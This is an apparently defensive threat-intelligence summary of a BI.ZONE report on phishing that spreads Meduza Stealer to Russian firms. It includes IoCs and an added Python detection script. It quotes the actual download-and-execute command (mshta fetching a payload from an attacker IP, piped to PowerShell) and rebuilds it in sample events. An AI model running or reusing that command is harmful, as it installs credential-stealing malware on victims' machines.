Meduza Stealer Targets Russian Companies via Phishing Campaigns

In August 2024, BI.ZONE released a detailed report revealing increased phishing attacks leveraging the Meduza Stealer malware to target Russian organizations.

The original image was generated by OpenAI's DALL-E and edited by the author. Source: OpenAI (September 2024)

Introduction

In August 2024, BI.ZONE released a detailed report revealing increased phishing attacks leveraging the Meduza Stealer malware to target Russian organizations. The attackers, identified as part of a threat cluster known as "Stone Wolf," exploited the reputation of legitimate industrial automation companies to trick users into downloading malicious payloads.

Report Overview

Stone Wolf's malicious campaign began by disseminating phishing emails that looked like legitimate communication from well-known industrial automation providers. These emails contained an archive named "Dostavka_Promautomatic.zip," which, when opened, revealed a combination of legitimate and malicious files, including a digital signature (.p7s file) and a decoy document (.docx). Alongside these was a malicious URL file, "Scan_127-05_24_dostavka_13.05.2024.pdf.url," which led to the deployment of the Meduza Stealer malware.

Phishing attacks relying on recognizable brands and logos remain highly effective. These visual cues establish trust with unsuspecting users, making them more likely to engage with malicious content. Stone Wolf's use of industrial providers as the cover for their attacks capitalizes on this vulnerability.

Once the malicious link is opened, it loads a file from a remote SMB server: a Windows shortcut file that triggers a command chaining the built-in SyncAppvPublishingServer.vbs script with mshta and PowerShell:

SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -

This command downloads and executes an HTA file, which, in turn, executes an AES-encrypted payload through PowerShell. The payload downloads additional malware components from the same remote network, ultimately leading to Meduza Stealer's installation.

Meduza Stealer is a commercial malware-as-a-service tool that first surfaced on underground forums in June 2023. Available for purchase through subscription models, it offers cybercriminals access to a web panel that tracks the data collected from infected systems. Despite claims that Meduza Stealer's executable contains an anti-CIS module designed to avoid Russian targets, BI.ZONE's sample of the malware demonstrated no such restrictions.

Upon successful execution, Meduza Stealer collects a wide array of information, including:

  • Operating system details
  • IP address and screen snapshots
  • Credentials from browsers (e.g., Chrome, Edge, Yandex)
  • Password manager data (e.g., 1Password, NordPass)
  • Cryptographic wallet credentials
  • Windows Credential Manager and Windows Vault data

The malware also retrieves session data from communication tools like Telegram and Discord, along with Steam tokens. This collected data is transmitted to a command and control (C2) server for the attacker's use.

Insights and Analysis

BI.ZONE's report stresses the importance of user awareness and regular cybersecurity training to combat phishing attempts. The following preventative measures are recommended:

  • Regularly train employees to recognize phishing techniques, especially those using trusted brands to establish credibility.
  • Implement robust email filtering systems to block malicious attachments and links.
  • Utilize endpoint detection and response (EDR) solutions with specific rules to detect abnormal MSHTA or PowerShell activities.

By leveraging trusted brands and delivering highly potent malware like Meduza Stealer, attackers continue to pose significant threats to organizations globally. Regularly updating detection systems and maintaining awareness of phishing techniques is crucial to minimizing the risks associated with such attacks.

Indicators of Compromise (IOCs)

Indicator | Type | Description
cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0 | Hash | File hash related to malicious activity involving Meduza Stealer
864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bb | Hash | File hash associated with Meduza Stealer campaign
193.124.33[.]71 | IP | Remote network location involved in hosting and distributing Meduza Stealer payload
109.120.177[.]48 | IP | Additional IP address used for malware command and control
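The EDR recommendation above (rules for abnormal MSHTA or PowerShell activity) and the IoC table can be turned into concrete detection logic. The following is an added example written for this summary, not code from BI.ZONE or from the original report: it refangs the published indicators, applies a rule that requires all three components of the quoted execution chain (SyncAppvPublishingServer.vbs, mshta, powershell) in one command line, flags mshta loading an HTA from a remote URL, and matches file hashes and contacted IPs against the IoC list. The process-creation event format and the sample events are constructed for the example; field names such as `cmdline`, `sha256` and `dest_ip` are assumptions, not any particular product's schema.

```python
"""Detection helpers for the Stone Wolf / Meduza Stealer chain described in the article.
Added example; the event format and sample events below are constructed, not taken from the report."""
import re
from dataclasses import dataclass

# Indicators as published in the article's IoC table (defanged notation kept as-is).
PAGE_IOCS = {
    "hash": [
        "cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0",
        "864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bb",
    ],
    "ip": ["193.124.33[.]71", "109.120.177[.]48"],
}


def refang(indicator: str) -> str:
    """Convert defanged notation ('[.]', 'hxxp') back to the literal form that appears in logs."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_HASHES = {h.lower() for h in PAGE_IOCS["hash"]}
IOC_IPS = {refang(ip) for ip in PAGE_IOCS["ip"]}

# Chain rule: each component alone is noisy (SyncAppvPublishingServer.vbs and mshta are signed
# Windows components); requiring all three in a single command line is what makes it specific.
CHAIN_PATTERNS = {
    "appv_vbs": re.compile(r"SyncAppvPublishingServer\.vbs", re.I),
    "mshta": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
}
# mshta fetching its HTA over HTTP(S) instead of from a local path.
REMOTE_HTA = re.compile(r"\bmshta(?:\.exe)?\b\s+https?://", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Finding:
    event_id: str
    rule: str
    detail: str


def check_event(event: dict) -> list:
    """Apply the chain rule, the remote-HTA rule and the IoC matches to one process-creation event."""
    cmdline = event.get("cmdline", "")
    out = []
    if all(p.search(cmdline) for p in CHAIN_PATTERNS.values()):
        out.append(Finding(event["id"], "lolbin_chain",
                           "SyncAppvPublishingServer.vbs + mshta + powershell in one command line"))
    if REMOTE_HTA.search(cmdline):
        out.append(Finding(event["id"], "mshta_remote", "mshta loading an HTA from a remote URL"))
    sha = (event.get("sha256") or "").lower()
    if sha in IOC_HASHES:
        out.append(Finding(event["id"], "ioc_hash", f"file hash {sha[:12]}... is in the IoC list"))
    seen_ips = set(IPV4.findall(cmdline))        # addresses embedded in the command line
    if event.get("dest_ip"):
        seen_ips.add(event["dest_ip"])           # plus the network destination, if logged
    for ip in sorted(seen_ips & IOC_IPS):
        out.append(Finding(event["id"], "ioc_ip", f"contact with IoC address {ip}"))
    return out


def scan_events(events) -> list:
    """Run check_event over a batch of events and return every finding."""
    findings = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


# Constructed sample events: one benign baseline, the chain quoted in the article, a hash hit,
# a C2 contact, and a benign local mshta use that must NOT fire.
SAMPLE_EVENTS = [
    {"id": "ev1", "image": r"C:\Windows\explorer.exe", "cmdline": r"C:\Windows\explorer.exe",
     "sha256": "00" * 32, "dest_ip": None},
    {"id": "ev2", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs ; mshta http://"
                + refang("193.124.33[.]71") + ":3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -",
     "sha256": "11" * 32, "dest_ip": refang("193.124.33[.]71")},
    {"id": "ev3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\Public\update.ps1",
     "sha256": "cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0", "dest_ip": None},
    {"id": "ev4", "image": r"C:\Users\Public\Scan_127-05_24_dostavka_13.05.2024.exe",
     "cmdline": r"C:\Users\Public\Scan_127-05_24_dostavka_13.05.2024.exe",
     "sha256": "22" * 32, "dest_ip": refang("109.120.177[.]48")},
    {"id": "ev5", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta", "sha256": "33" * 32, "dest_ip": None},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.event_id}: [{f.rule}] {f.detail}")
```

The chain rule and the remote-HTA rule are independent, so the quoted command line produces two findings plus an IoC hit on the hosting address, while the local `help.hta` launch in ev5 produces none; hash and IP matching are kept separate from the behavioural rules so that the rules keep firing after the attackers rotate infrastructure.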

MITRE ATT&CK Techniques

Tactic | Technique | ID | Description
Execution | Command and Scripting Interpreter | T1059.001 | PowerShell used to execute malicious scripts and download payloads
Execution | System Binary Proxy Execution | T1218.005 | MSHTA leveraged to execute HTML Application files remotely
Exfiltration | Application Layer Protocol | T1071.001 | Use of web protocols to exfiltrate data from infected machines

References

BI.ZONE (August 2024). "Stone Wolf employs Meduza Stealer to hack Russian companies: A new cluster of activity abuses a legitimate brand to spearphish for credentials and system data."